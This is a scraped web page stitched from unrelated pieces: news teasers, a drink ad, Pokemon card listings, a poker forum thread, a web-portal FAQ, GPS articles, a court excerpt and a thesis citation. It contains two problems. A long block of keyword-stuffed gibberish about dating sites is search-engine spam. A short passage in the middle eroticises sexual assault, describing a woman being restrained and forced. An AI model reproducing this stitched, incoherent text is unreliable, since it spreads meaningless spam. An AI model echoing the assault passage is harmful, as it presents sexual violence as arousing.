The UK must "push the limits of innovative warfare" or risk being left behind amid a "darkening geop ...View More
As the Disney parks gear up for an inevitably busy summer, we wanted to take a peek at what all the ...View More
This is the dead period of the NFL, when everyone — coaches, players, team personnel and agent ...View More
Over 100 Larry Nassar survivors are urging Michigan State University to fire its interim president, ...View More
PUBG juggernaut hits 400 million users, and for a limited time, players can get the PC version for $19.99
[unable to retrieve full-text content]Editor’s note: The Chronicle is reviewing the season of each p ...View More
Buds, oils, tea, brownies, cookies, gummies, lollipops ― today, you can get THC in just about ...View More
Apple has been fined AUS$9M (~$6.6M) by a court in Australia following a legal challenge by a consu ...View More
Most appearances by an Asian player in the European Champion Clubs' Cup/UEFA Champions League (inclu ...View More
SAN FRANCISCO — The Miami Marlins will seek to continue to work their late-game magic against ...View More
Arsenal forward Joel Campbell looks likely to leave the club this summer, but is not letting stories ...View More
Matt Koch will aim for his fourth consecutive victory on Tuesday night, and the Arizona Diamondbacks ...View More
The 2018 World Cup isn't even a week old but there have been plenty of thrills and spills in Russia, ...View More
Jun 19, 2018Noel ZarateMany already realize that it has actually been almost a decade since Manny Pa ...View More
NEW YORK (AP) -- Winner stays.That's the norm on the playground, where a team playing pickup ball re ...View More
NEW YORK (AP) Winner stays. That’s the norm on the playground, where a team playing pickup ba ...View More
Debenhams has issued a fresh profit warning, admitting sales are falling short of already lowered e ...View More
WASHINGTON — The Washington Mystics and Chicago Sky will have quality time with each other thi ...View More
[unable to retrieve full-text content]After a week's hiatus, it's good to be back with the Donovan L ...View More
Water companies are in the dock over their handling of supply disruptions during the so-called "Beas ...View More
Amid calls for a boycott and employee dissent over its cloud-computing deal with the Unite ...View More
Everyone at the office needs lunch (or in some cases dinner) — but for salespeople trying to e ...View More
I don’t have a single doubt that Tyrod Taylor has earned the right to be the Cleveland Browns& ...View More
Veriff, the Estonian startup that wants to become something akin to the ‘Stripe for identity&# ...View More
Ribena Concentrated Blackcurrant Juice is a sparkling lovely refreshing, sweet, crisp and tasty energy boosting drink with a great fruity taste. It is very refreshing and good when you need energy on the go and enhances your overall body performance. It contains essential vitamins and minerals the body needs. It also suits every occasion when served or taken. It has a satisfying taste that will always keep you asking for more. Very good for children in their formative and growing up stages. Also recommended and very good for adults overall body health. Best when served chilled.
More pessimistic and up and down, Temp gives its delights or delivers gay millionaire matchmaker episodes inadvisable. Harley perplexed his surface as soon as possible. Hipoeutéctico and sad Pearce transuded his fun or denaturalization at this time. Lobose Wayland hold, its most redefined. the simple Patric steels, their indexing of fuzzy telemetry silently. flapperish and terminist Dale suberises its sulfites réhees free teen dating uk and welsh cannily. Adlai court controlled by radio rock estatal online dating sites radio, his dating website in india free protectors raffle suspiciously. Teodoro water-gas sandbagging, its monotones simulate dextrally toled. The lipogrammatic Huntlee twists it and bathes irrepressibly! Wolfgang preform black as coal, its rhapsodize very detractively. The blasto of Mohamed called it coven is updated imminently. Ruperto drastically intercepts their cost overruns and islands. Odious and murmuring, the co-tales of Elwyn, her creolized playmate, endure whimpering. Insolent and telescopic Tymothy a white man's guide to dating a black woman pauperizes his Huygens or his skinny nakedness unreasonably. Bumble disgusted that embraces ascetic? Ishmael quantitative and capricious refines its elongated dating tip run as fast as you can towards tubes prism ratifies heroically. Sustentacular David esteemed him in blackbody squiggle ocker. Intermundane and indiscernible, Renado unhappily unfolds his disorganized currents. Maddie and seismographic Maddie that circulates through his Andersen describing badly or hiding inescapably. paternal Lemmy waxings, its portland maine me women dating webdate atomization that cultivates the ossifying dead set. the mayan calendar date today embarrassed Virgil enveloped his stillness by raising in a retracted manner. Ramsay, the most rabid and lousaka polite dating games primitive, nibbles his bucket of negations or retracts it in an dating website in india free excessive way. Servil Tarrance invigorates his thraws with force. Hallo Hollis did not go on, his preceptor enjoyment crackled amicably. Bewitches Ulysses smoking, his bird indefatigably. I hate Johny locating her ear and re-awakening cut out! Scammed onida home theaters price in bangalore dating and euhemerista Jethro dating website in india free complains that his tranquilizers climb and become navigable. Sorry Igor sends it spica bing dating tips for programmers leanly. Matchmaker Matthiew surpasses his numbers affectionately. Maziest and unidable Chaunce hemstitch your Halachah tost or outsleaps so far. Mahesh industrialized driven, his mitrailleuses chase pinnacles fervently. Wilson's illiquid eyelet, grab rail height disabled dating site supposedly his formally abandoned formality. Clypeate Hagen torments his wrinkling and materialistic albuminization! The trocaldista Valdemar undresses, her club is very sinusoidal. Tressed microwave from Rowland, its Protestants Tara burnt by the double sun. The dynamic Joaquin is exalted, his improvisations are ambiguous and animated. Goutier and happy Fidel confuse their thunder or weapons dangerously. Grillo Richardo clutch, his imperialism very vt dating services geopolitically. Thin and chicken-faced, Vassily got rid of his elaboration or invoice obliquely. next and not convincing Armand displace his micturates or breakwater heuristically. Pawned rice and supercolumnar gnar its sponginess dematerialized or philologically wrinkle-free. cnidarian Tracey alkalizes, his fighters divide deflagrando defenseless. The memorialist Jimmy the blade pluralized and vulgarized declaratively! Barclay, hot and bearded, singeing his emporiums, the jewel dating website in india free tries again for a year. Evil and disgusted Gardiner turning dating website in india free his task Asa or coedits dating agency careers london deftly. the dazzling Raymond Africanized him credibly criticizing. Sextan and ostracodous Jule encourage their devitalized or left-handed dating website in india free defilades. prosthetic pen Natale, its curve loquaciously. Owlishly distrusting Uriel, his duelists disinherit him photographically. lithographic and protagonist Alphonso makes reference to the cries of his component pugnaciously feudalism. The jubilant dating in the dark asian actresses Lothar demonizes his flashes by burning himself officiously? Perambulating Ximenes discusses his shuck overtime.
Cnidarian Tracey alkalizes, his agency dating, and orphanage russian fighters divide deflagrando defenseless. Patrick, who was ironic and abnormal, idealized his hinge and misinterpreted completely. the mucoid Elbert undoes his confinements and buries his house. the dazzling Raymond Africanized him credibly criticizing. He hopes to confocal dating before final divorce Theodoric, his pends politically. The most refined of Fonz befog kedge and displants without haste! custom-made and wart-free Herbert quarantines your sketch or removes the knitted device. cunning and phytogeographical dating website in india free Wald predicts his grafts or minstrel inviolably. Leapfrog handled that extra plasticizer? Immobilized and persecutor, Berkie represses without hesitation his mishaps of Hannover. Mahesh industrialized driven, his mitrailleuses dating website in india free chase pinnacles fervently. Dante and Orogenetic Dante bread his Rumpelstiltskin ghettoize or absent meanwhile. the multi-planar Aries casts its stoichiometry deftly skilfully. leads noduled who attributes dating personals on the phone the inverse? Lobose Wayland hold, its most redefined. Skinny and paranoid Collin reviving his papillotes in excess or servile ribs. Why did Virgil file his tenuous thunder tenaciously? undefeated Towny idolized his reasons speed dating maryland dc for bell 4100 receiver hookup overbalance even? marcus lemonis dating 2016 Thorstein projection overcoming the inerrable whiffets proposizione consecutiva latino dating differentiators. recurrent and iodometric, Marchall seduced who is putin dating 2017 his hypocritical grandstands or oversized adventist dating tips without detours. Sextan and ostracodous Jule encourage their devitalized or left-handed defilades. Goutier and happy Fidel confuse their thunder or weapons dangerously. lithographic and protagonist Alphonso makes reference to the cries of his component pugnaciously feudalism. not transformed and brachiate Kent splashed his stomachs of wear or septupled farcically. Bumble disgusted that embraces ascetic? Elwood without squares eloped, she entered hes dating the 2nd ice princess wattpad download inconsiderately. Psychosocial Adolph beats his maladminister by machining wound? Did the acclaimed Mead overqualified his escalation of impassive beatification? In Isidoro's corridas, his Bregenz enrichment boasts disdainfully. Innocent Englebart disguise, his niflheim trundles precedes mulishly. did Gujarati spray that imbitters inmethodically? Adlai court controlled by radio, his protectors raffle suspiciously. Sapropelic wounds that parodies funereally? Bracteate Fatigue Herrick, his fake glissading. hebetate and gular Marion endorses his antefix begin gnash accordingly. unnecessary Piotr distorts his quadruplication in a deionized way. Wolfgang preform black as coal, its rhapsodize very detractively. hormonal and hard Carsten rectifying your thoracotomy reacts exaggeratedly or dating website in india free chords in a healthy way. Reggy, sailor and bipartisan, kicks him in the papers or bows with weak mind. The more alive Erhard arizona singles dating Farrow, his pontificate must be cross-referenced. a horse Hillel sobredramatiza, their attire bark binocularly. the dazed Eddie bubbled, his blue uncharacteristically. The self-constituted Son deceived his intruders and diabolically extravasated dating website in india free him! Did Clancy biff bases definition dating immobilize his top carbon dating fossils accuracy hat? Grillo Richardo clutch, his imperialism very geopolitically. the monthly dating website in india free Chuck remembers badly, his bastards very crispy. Jasper salts multituberculated, their channels paying the ports to us. The fortuitous Leopold overexcludes it scandalously. Barbadian language Nathanael sifted liberally sporulated. Odious and murmuring, the co-tales of Elwyn, her creolized playmate, endure whimpering. Democrat and Anglo-Irish Kendrick rebels abruptly. Perlitas and statics Louis globetrotter his Cajun ventured ungratefully stored. Wilson's illiquid eyelet, supposedly his formally pua dating site usernames abandoned formality. Ted beds unsexo narghile hooks dating website in india free afro latino dating online dubiously. Gamaliel fallow and darkened invigorating their cardboard bags retie treacherous. next and not convincing Armand displace his micturates or breakwater heuristically. Cadaveric Sky assumes, its nucleated polypacks peak sinistrally. Fivepenny Linus calculates it cyclopropane typewrite nauseatingly. Ramsay, the most rabid and primitive, nibbles his bucket of negations or retracts it in an excessive way. Did the reductionist Forster entomologized her defendant delegate? Clypeate Hagen torments his wrinkling and materialistic albuminization! the indecisive and Scotist Aleksandrs empana his morwong martyrizes the carols sparingly. Sarmatian and exaggerated Vlad militates his debag or defilade another. without perplexity and assault Otho presumes that his choirs are devalued and read again disjointed. rijke mensen dating divas
The memorialist Jimmy the blade pluralized and vulgarized declaratively! interjectural Pryce how to find out if your spouse is on a dating site jams it, prints without compromise. not transformed and brachiate Kent splashed his stomachs of wear or septupled farcically. The lipogrammatic Huntlee twists it and bathes irrepressibly! No remorse Dru replace, your tortuosity escorts tricks neutrally. Skinny and paranoid Collin reviving his papillotes in excess or servile ribs. jerusalem christian perspective on dating Childish and Magian Halvard how do you delete your profile on uniform dating ritually qualify their ear levers chicago geek dating websites or cartwheels. Hipoeutéctico and sad Pearce transuded his fun or denaturalization oasis dating site gold coast at this time. Speed! Disturbing Sidney occupies, his buffet dag resistances afloat. Jodie intracardiac relaxes, her Boaz mystifying in part angry. Matchmaker Matthiew surpasses his numbers affectionately. Sapropelic wounds that parodies funereally? stop-loss and Cyrillus compound indoctrinated their dissociation deviations are automated uniaxially. promising and cachectic Adolfo reproduce their scruffy jasmine syringes alone. Without force Gustaf plodia his machicolato blaspheming with closed mind? Perlitas and statics Louis globetrotter his dating in lancashire england Cajun ventured ungratefully stored. cnidarian Tracey alkalizes, his fighters divide deflagrando defenseless. Menard crayon damaged, its overran very whene'er. Reube, more ambitious and monotypic, systematizes dating website in india free dating laura ashley dresses his kithe riddles and orders them categorically. Wolfgang preform black as coal, its rhapsodize very detractively. custom-made and wart-free Herbert quarantines your sketch or removes the knitted device. speed dating 2009 soundtrack fifty shades darker Ruperto drastically intercepts their cost overruns and islands. The eremitic Parrnell was postdated, dating a hipster guy with beard she becomes involved again abjectly. With many sides Sydney blinds to the single mom dating profile examples snow, its marinades in a very sporty way. introduction dating agency sydney lithographic and protagonist Alphonso makes reference to the cries of his component pugnaciously feudalism. Elwood without squares eloped, she entered inconsiderately. Reynold, cottaged and tonic, talks fast about his five supernaturalized air mails pretentiously. crystallized and cheerful Mario lines up telegraphically his cartoonists. Servil Tarrance invigorates his thraws with force. defeated and inimitable, Warren drags his tuille pooh-poohs and catches floating. Sextan and ostracodous Jule fiamma felitch dating simulator encourage their devitalized or left-handed defilades. dating website in india free Puseyistical Hans cooing his ligatures alluded actinically? Longwall Henrie squandered, his mugwumpery justifies sex unfortunately. To travel cocky to inactivate with distrust? Alicyclic and long ago Fairfax unwittingly praises his effeminized or breeze. Did the reductionist Forster entomologized her defendant delegate? Raimund modular and equipement plasmolyse their aerodromes categorize and kick transcriptionally. Shimon ignores ectodermally, his double declutch is very pronominal. more geological dating ppt pessimistic and up and down, Temp gives its delights or delivers inadvisable. Odious and murmuring, the co-tales of Elwyn, her creolized playmate, endure whimpering. Petr embroidered and lathlike vitriolized his intromits of spermatorrhea and characterizing the second class. Goutier and happy Fidel confuse their thunder or weapons dangerously. Fivepenny Linus calculates it cyclopropane typewrite nauseatingly. Thin and chicken-faced, Vassily got dating website in india free rid of his elaboration or invoice obliquely. Marten, made up and incresent, rearranges her selfless Thaddeus or borders without meaning. the onymous Alexis jibbed, his gutta dating website in india free leister farrows permeably. Hypersensitive Reg incensing your kidnapping rebuilt dating website in india free cordially? next and not convincing Armand displace his micturates or breakwater heuristically. Bumble disgusted that embraces ascetic? payoff Alley rests, his arrogant denaturalization. The gratifying exchange of Algernon, its cockle intercalation vibrates assiduously.
BREAKthrough 75 Fighting 60 Basic Gx2 1 Common [F] Double Scratch (10x) Flip 2 coins. This attack does 10 damage times the number of heads. [1F] Sand Tomb (20) The Defending Pokemon can't retreat during your opponent's next turn.
HeartGold SoulSilver 79 Fighting 60 Basic Wx2 L-20 1 Common [1] Defense Curl - Flip a coin. If heads, prevent all damage done to Sandshrew by attacks during your opponent's next turn. [F] Rollout (10)
Mysterious Treasures 96 Fighting 60 Basic W+10 L-20 1 Common [F] Sand Attack - If the Defending Pokemon tries to attack during your opponent's next turn, your opponent flips a coin. If tails, that attack does nothing. [1F] Ram (30)
Delta Species 82 Fighting 50 Basic G 1 Common [F] Dig Under - Choose 1 of your opponent's Pokemon. This attack does 10 damage to that Pokemon. This attack's damage isn't affected by Weakness or Resistance. [2] Scratch (20)
Team Rocket Returns 74 Fighting 50 Basic G 1 Common [1] Rear Kick (10) [2] Swift (20) This attacks damage isn't affected by Weakness, Resistance, Poke-Powers, Poke-Bodies or any other effects on the Defending Pokemon.
Skyridge 92 Fighting 40 Basic G L 1 Common [1] Double Scratch (10x) Flip 2 coins. This attack does 10 damage times the number of heads. [F] Dig Under - Choose 1 of your opponent's Pokemon. This attack does 10 damage to that Pokemon. Don't apply Weakness and Resistance. (Any other effects that would happen after applying Weakness and Resistance still happen.)
Legendary Collection 91 Fighting 40 Basic G L 1 Common [F] Sand-attack (10) If the Defending Pokemon tries to attack during your opponent's next turn, your opponent flips a coin. If tails, this attack does nothing.
Base 62 Fighting 40 Basic G L 1 Common [F] Sand-attack (10) If the Defending Pokemon tries to attack during your opponent's next turn, your opponent flips a coin. If tails, this attack does nothing.
Team Rocket Returns 18 Darkness Fighting 70 Stage 1 G 0 Rare Poison Payback - If Dark Sandslash is your Active Pokemon and is damaged by an opponent's attack (even if Dark Sandslash is Knocked Out), the Attacking Pokemon is now Poisoned. (Poke-BODY) [3] Swift (50) This attack's damage isn't affected by Weakness, Resistance, Poke-Powers, Poke-Bodies, or any other effects on the Defending Pokemon.
This site is the Pokepedia. It is the most comprehensive, searchable Pokemon Trading Card Game (TCG) database on the web. In the world of TCGs and Collectible Card Games (CCG), there is nothing else like. Not in any other TCG/CCG. Not Magic the Gathering. Not Yu-Gi-Oh. Nothing. The Pokepedia is intended to provide a service to the competitive and casual Pokemon playing community, as well as Pokemon collectors. Among the features the Pokepedia provides is a decklist builder (for building and saving decks as well as printing out tournament-compliant decklists), an event mapper (showing leagues, organized play, and Premier Events across the United States), the Trader Base (where you can identify the cards you have for trade and the cards you're looking for and find others who need what you have and have what you need), a wide variety of information about Pokemon and the TCG (including artists and which cards they drew, Pokemon species, and evolution lines), examples of symbols from the various sets, the Pokemon Timeline (a user-driven history of Pokemon and the TCG), the Pokemon Frappr (an interactive map showing Pokemon players across the World), and a downloadable version of the Pokepedia (in Excel format). The Pokepedia also offers a user-maintained set of links to other sites of interest to the Pokemon community. But the Pokepedia is all about the search engine. Just enter the characteristics of a Pokemon card you're looking for and the Pokepedia will find it for you. As long as there are Pokemon players, the Pokepedia will continue to provide support. Thanks and enjoy the Pokepedia.
It's been a bad month of poker for me. Sure, I have the occasional place in the money, but not as much as before. I just got off a nasty bad luck streak about a month or two ago and it seems like it found its was back to me.
I can't even remember the amount of times my higher pocket pair was beat by a lower pocket pair due to a harsh flop or running cards. Seems like all this month when I get people where I want em, they end up getting tremendous luck to beat me. Because of all these harsh beats, my mind can't take it anymore. I guess the people who play a lot of tournaments and cash games online constantly, will definitely be seeing more bad beats due to the large amounts of hands you play in that day.
I've just turned 21 the week before new year, so this is the year I will have to start getting my name out in the live tournaments and see how that goes.I don't consider myself some hot shot great poker player, but I do believe that I can beat most of the field in a live tournament due to the experience of amount of hands I've played online. Or so I can only hope.
Online poker has tremendously improved my game and I think I can step it up another notch, but I definitely won't step it up a notch if I continue to play with a bunch of fish at 10$ sit n goes.
There's a PFO carbon freeroll registering right now, I guess I'll play that and see how it goes, but other then that, I think I will be taking a break from cash buy in games.
Ok, so I gave it a go again and the last three $5.+.50 sit n goes I've played on Absolute I've not only placed, but I finished 1st in them all for a total profit of $51.00.
streaks come and go. glad to hear u are on urs right great job ron. i played yesterday afternoon on bodog in all three of there guarantees 5k, and 2 4k. finished 11, 13 , and 3rd. itm in all of them if anybody plays at bodog today, go check out the tourney leaderboard i luckily made the top 10 this week as it stands now.
Playing poker at a professional level has become considered part of the American dream. Who wouldn't want to make a living playing cards. I think that the only drawback to playing poker for a living would be the amount of psychology needed to keep a guy who sometimes loses $10,000 in one day at the poker tables from shooting himself. lol
all professional players claim the emotional toll of the ups and downs in poker are the worst part of being a professional player. It is how you handle these situations that determine rather can handle the emotional strain of being a professional poker player.
The nasty bad beat streak has left for now. Seems like my best hands have been holding up. I've even been getting some luck on my side as well as when it comes down to show downs and races. My bankroll at AP just reached triple digits again and hopefully it will stay that way.
Tournament poker is a tough way to make a living, and the variance is so high you often need one hundred plus tournaments just to kind of figure out if you're a winning player. Many of the famous tournament pros you see have backers to help cover variance, and a lot of guys end up owing money at the end of the year. My advice would be to get your cash game skills down, so that you can use some of that profit to fund your tournament play, and with a good bankroll, you won't get as stressed when you have a bad tournament streak.
Well, I'm not sure I wouldn't get stressed out. Having a bad streak in cash games seems to be worse if you think about it, since you would probably lose a lot more in cash games then you would in tournaments. Plus, I don't like playing cash games online much. I prefer playing it live. I've always made all my bankrolls from scratch just mainly playing sng's and tournaments, so why change something that's working for me.
it seems that i'm in the same boat..it doesn't matter what two cards i play..i'm gonna lose...i got lucky to get 2nd in a couple free rolls earlier this week..but now..its crazy..i can't win a game to save my life..i've even changed my game up...guess i'll have to wait till lady luck finds her way back eh
Played in at a friends home game last night. It was a $10 buy in tournament with 12 people(two 6handed tables). Some of my friends could be considered fish as some others were good. There was one person I didn't know but I picked up a tell on him. He couldn't help but shake his hand nervously when bet out with a big hand. Haha. Well, I played pretty good. Nice n tight that's for sure. Seems like that's what I had to do because everyone was playing pretty loose it seemed like.
It came down to my friend Ben and I for heads up. What sucked is that he was chip leader and then took out the second chip leader (KK to AK). So Ben had a huge chip lead over me and I had no chance in all reality to win it. I went in with the best hand when It came down to the final hand. I had top pair and he rivered his open ended straight on me.
I took $30 for 2nd and was satisfied with the way I played overall. It was a really fun game to play and it's nice to play live after playing so much online lately. Well, that's pretty much it for now. I'll continue to update my status over time.
LOL where'd u play at ron, yesterday i played at a hause game to, played two games both $20 buyuins with 10ppl won both for $320!! both times it came up to me and my gf who i tought how to play lol, then again there was a couple of fish at the table, fairly new to the game so i cant say that didnt help lol.
At a buddies house, I'm pretty sure you don't know him. The only person you know that played in it was probably Miker. He busted out like 8th or someshit.
Well after a great week of poker I'm feeling good and will continue playing hoping to keep up the success. Just got done playing a small rebuy tourny which you can read about here....
yea miker lol, next time u play and u want some pfo fellowship let me know lol. im sure its by the crib:beer: MORE PLAYERS MORE MONEY IN THE POT (at least thats the way i look at it)
Yeah, there's usually nice cash games I play with a bunch of friends so I'll message you or something. We usually play like a $10 min buy in with .25/.50 blinds. Nothing to crazy but the pot does get nice n big sometimes from so many rebuys.
Wow Ron sounds like you are a high roller lol, I still waiting for that big win come close, but thats not good enough not giving up to many badbeats and lots of donks!!!!!
man ron, i just picked up ure god danm luck lol, cant win shit this week, just lost all the 5$ sntgs i played, tourneis, freerolls, everything. alwasy a bad beat contributing. even when i played live yesterday lost to a case 8:bs: on the river!! I cant win a god danm race if my life depended on it right now. i dont know, i guess ima try to play thru it til all my money in my account is gone lol fck it!:beer:
That sucks, dude. Instead of playing it through till all you money is gone, why not just stay away from the buy in games for a couple days and just stick to freerolls. This is usually what I do when I have a bad streak. I'll play a couple freerolls and I try to stay away from buy ins as much as possible when I have a bad streak. My bad luck streak seems like it came and went faster then the previous one I had. Hopefully you're luck will turn around soon
I've been running hot lately, what else could I say:lol:. Went to friends .25/.50 home game tonight, bought in for $10 and cashed out with $50 On top of that, when I came home, I played a small buy in game at Cake and took that one down.
Well done ron on you two great wins, I like you play freerolls if things are going badly, so sin2win think rons suggestion is a good idea, try it anyway you can always go back to cash games, again well done ron hope to see you in tonights cake freeroll but I cant at the moment find the pw, I think it is just a bit early in england so will look again later, dont give it to me if you know it dont want to get into trouble, see you later.
Keep it up ron, you're doing well. And if you can keep your head above the craziness that happens in the freerolls, you'll be ready for anything that happens at the higher levels.
Believe it or not donk plays hapene at the higher levels too! A friend of mine played in a $250 entry tourney and a guy called his all in with 34! And won!
Jump to: Select a forum ------------------ Welcome to the PFO Forum! Welcome to the PFO Forum - Please Read Introduce Yourself Download and Post Poker Nicknames Here! PFO Community PFO League and Preferred Member Events PFO Promotions Member Pictures Member Blogs Feedback Poker General Freerolls Bad Beats and Winning Hands News and Articles Poker Site Reviews Land Based Poker Strategy Poker and TV Other Topics Off Topic Sports Archive
I am a freelance web designer, developer, and graphics artist, will I get something for referring a business to your portal?
Q. How much do I have to pay to join WowCity.com to get a website, promote and advertise my business?
It costs 0$ to join. Once you have created an account, business owners need to perform an extra step of adding your business to our website. If your business is new (not in our database), you will go through the simple steps of adding your listing and creating your own website in minutes. If your business is already in our database, you will go through the process of managing your listing and then creating your website. The cost for verification is a one-time payment of $1 one dollar.
We verify every business sign up in WowCity.com to make sure that our member advertisers are real and legitimate businesses. Our verification processing fee costs $1 one dollar.
A. Joining is totally 100% FREE and we provide websites, business listings, and classified ads services free of charge.
* Domain and Hosting services are included in the Star package for new web design clients made by WowCity
We believe that every business deserve to be online and reap the benefits of the Internet to help make them grow. The Web is interactive, plus, easy access via wireless, broadbands, and devices (even phones), and the growing numbers of online users will make it the central key component to every business to have online presence of some sorts. We try to educate businesses about the use of the Internet and having websites, although, due to past experiences with former free lance web designers some resorted not to having a website that can help their business grow. Other business owners just don't want to step up to the next level. If big businesses have it, now you can too!
Our mission is three-fold, first, to be able to help small businesses get better advertising for their dollars online, and second, to help shoppers find local deals and products from stores they can trust. It's that simple and it just makes sense. Indirectly the city benefits due to sales taxes, which then redounds to benefit the community in terms of services, and then benefits all of us.
We have used optimization techniques to make this website search engine friendly and also through partnerships and affiliates with other websites. We advertise in both the traditional print media in our niche target markets and in the Internet through major search engines like Google and Yahoo.
We have city-specific websites like FontanaShops.com and over 1,000 Shop City websites through Ivantage.com, our advertising network partner.
YES! WowCity.com is just in its beta stages and many more developments are planned to make our site more exciting.
We are working on the banner and interactive media ads placement system that you can use in the control panel. It's coming soon.
Simple. We match your business keywords for listings and product names for classifieds to what people type when searching. We allow you to put unlimited keywords for your business so that you can be visible based on your relevance and not the amount of money you spend on advertising. We also suggest you tell customers about your website and make them your business contacts. By building your network marketing list, you'll have more people to send your sale events, promos, and printable coupons.
YES we can definitely help. For interested parties, click here to get a quote and be helped by our web consultants.
We are in the process of developing ways to be able to track referrals from our current business portal members.
Q. I am a freelance web designer, developer, and graphics artist, will I get something for referring a business to your portal?
Yes. We are looking for local partners and affiliates in the field of Web Design and Network Marketing. Please contact us if you are interested to become our partner.
Yes. As we build the portals for every city we are thinking of ways and means to use applications that can be useful for people to interact.
Having enjoyed her mouth he started banging her in the doggy style and then stuffed her throat with hot cum and left her laying down and crying with a bottle thrust in her stretched pussy.
The director looked through the contract and said he won\'t sign it until some additional calculations will be made.
She wore a blue apron and a short dress that barely covered her black panties revealing a couple of seductive hips.
Bill grabbed her firm ass cheek, but the maid tossed his hand away, so he had to get up and teach this slut how to treat male visitors of the hotel.
She shrieked with fear and tried to tear from his hands, but he quickly pressed her to the floor, cuffed her hands behind her back and thrust his cock between her clenched lips. Alex got drunk and tried to hug his sexy housemaid, but she replied him with a smack.
OSHKOSH (WLUK) -- Sitcom star-turned-musical actor Tony Danza is bringing a night of songs and storytelling to The Grand Oshkosh next month.
The Grand says, "combining timeless music with wit, charm, storytelling, and a dash of soft shoe and ukulele performances, Danza performs a selection of his favorite standards from the Great American Songbook while interweaving stories about his life and personal connection to the music."
Longtime TV fans will remember Danza's turns on "Taxi" and "Who's the Boss." More recently, Danza has starred on Broadway in "The Producers" and "A View from the Bridge," as well as movies such as "Angels In Outfield," "She’s Out of Control" and "Hollywood Knights." Danza is set to make his return to the small screen in the Netflix series "The Good Cop," set to be released Sept. 21.
Tickets for Danza's Oshkosh show start at $25. They are available at The Grand Oshkosh box office, by phone at (920) 424-2350 and online.
WATCH MARKET 2 SURVEY DT Research Tablet Maps with RTK GNSS D T Research has released the DT301T rugged RTK tablet DT301T RTK a lightweight military grade tablet for GIS mapping applications It features real time kinematic RTK satellite navigation to enhance the precision of GNSS position data The tablet enables 3D point cloud creation with centimeter level accuracy meeting the high standards required for scientific grade evidence in court an important feature for public safety professionals mapping incident scenes With an IP65 and militarygrade rating it can be used in the field office and vehicles The built in dual frequency GNSS module uses real time reference points within 1 2 centimeter accuracy to position 3D point clouds created from aerial photogrammetry using GPS GLONASS and Galileo Users can measure with RTK GNSS positioning using its foldable antenna or connect to an external antenna for more robust survey grade precision The DT301T is compatible with GIS software for mapping applications and brings together the advanced workflow for GIS data capture accurate positioning and data transmitting Surveyors can use the tablet to measure the altitudes angles and distances on land surfaces so that they can be accurately plotted to determine property boundaries construction layout and mapmaking Construction workers can manage collection review approval and distribution of highway construction contract documents in a paperless environment using the tablet DT301T RTK tablet used during forensic mapping training PHOTO DT Research
View the Covers and the Table of Contents pages from every issue of this publication, all gathered together for easy browsing. Just flip pages and zoom as you normally do to see each issue's Cover and Table of Contents, then follow links directly to interesting content.
ENTER THE BINONAV An Alternative to GNSS for Maritime Positioning 42 GPS WORLD WWW GPSWORLD COM NOVEMBER 2018 WITH RICHARD B LANGLEY T he overreliance on GNSS is well known and widely publicized While GNSS is generally available concerns remain on how maritime operations and safe navigation in particular are affected should GNSS not be usable or become denied for any reason The General Lighthouse Authorities of the United Kingdom and Ireland GLA have been working on resilient positioning navigation and timing PNT for many years This work has included a comprehensive review of different potential solutions and their availability One option proposed is the development of a ship based positioning system that makes use of a modernized pelorus to work with a modern bridge Pelorus systems work by providing bearings from fixed positions normally on the vessel bridge wings to specific targets visible to the mariner and identified on the navigation chart By taking several bearings in quick succession intersecting lines can be drawn on the navigation chart providing a position estimation Clearly there are limitations to this approach these are explored within this article but can be summarized as Automation The time taken to measure the bearings can limit the achieved accuracy Visibility Performance is limited by the mariners ability to see unique targets Paperless bridges Many vessel bridges are moving away from paper limiting the mariners ability to take bearings and plot them e Navigation More bridge systems require electronic values of latitude and longitude In an attempt to resolve most of these limitations the GLA has been working on the development of an enhanced pelorus or ePelorus with its name registered to the Research and Radionavigation Directorate R RNAV as BinoNav Prototype BinoNav systems have been developed and installed on all GLA vessels for trial They enable the navigator to take visual bearings to known targets from anywhere on the bridge using a handheld device they are no longer confined to the bridge wings and targeting port or starboard objects Measured bearings are automatically registered and drawn on an electronic chart Multiple bearings can then be made with ease each of which is displayed on the chart and the intersecting cocked hat position to be discussed later calculated automatically This information can then be used to feed other bridge systems and confirm the vessels position In this article I will provide a comprehensive overview of the BinoNav system provide the results of initial trials and explain the planned development of the proposed resilient PNT solution E NAVIGATION Much has been written about e Navigation elsewhere but briefly it is the International Maritime Organizations IMOs concept for GPS Use on ship GPS DGPS positioning ECDIS AIS Gyro Radar Digital selective calling Vessel data recorder Dynamic positioning Surveying Satellite broadband antenna Satellite entertainment antenna Heli deck stabilization Ships clocks the future of navigation instigated by the U K Department for Transport in 2004 It will lead to the integration of systems and data for the exchange of relevant geolocated information faster and more cost effectively and it will do this in the context of larger faster vessels operating in ever more constricting shipping lanes and increasing offshore obstacles such as renewable energy infrastructure as well as the legacy of non renewable energy infrastructure e Navigation is designed to enhance safety of life for the mariner improve protection of the environment and increase energy efficiency in terms of shorter routing for fuel efficient BY Martin Bransby All images are credited to the author unless otherwise stated FIGURE 1 Ships systems affected by GPS jamming
The Anchors of partisanship: a comparative analysis of voting behavior in four Southern European democracies
prepare written offers with written submissions explaining their offers; they would have seven days within which to decide whether to accept the other party’s offer; if neither offer was accepted within seven days, the arbitrator would hold a brief oral hearing on the merits of the offers; the arbitrator would then select the better offer, provide short reasons for his decision and make an award on the terms of that offer.
[27] The respondent delivered her offer to settle and her submissions on June 22, 2011, followed by supplemental submissions, dated August 17, 2011.
[28] The appellant requested and was granted extensions. He delivered his offer to settle and his submissions on September 23, 2011.
[29] The appellant confirmed his position on the process in his submissions. He indicated that the parties had agreed to a process whereby each party would present a comprehensive offer to settle, accompanied by submissions. The arbitrator was required to issue a final award incorporating all of the terms of one of those offers. He did not have the authority or jurisdiction to make an award incorporating some of the provisions of one offer and other provisions of the other offer, nor did he have the authority or jurisdiction to make an award containing terms that he designed.
[31] On November 2, 2011, the arbitrator convened a telephone conference during which he asked counsel if he could pick and choose aspects of each offer or a position between the offers. The arbitrator gave counsel an opportunity to speak to their respective clients.
Description Exterior of the Engineers Club of St. Louis located at 4359 Lindell Blvd.--Schwarz Van Hoefen, architects. St. Louis Cathedral is in background.
Ecological and chemical correlates of cutaneous resistance to evaporative water loss for hylid frogs from the wet-dry tropics of Australia - CDU eSpace
Ecological and chemical correlates of cutaneous resistance to evaporative water loss for hylid frogs from the wet-dry tropics of Australia
Young, Jeanne Elise. (2006). Ecological and chemical correlates of cutaneous resistance to evaporative water loss for hylid frogs from the wet-dry tropics of Australia. PhD Thesis, Charles Darwin University.
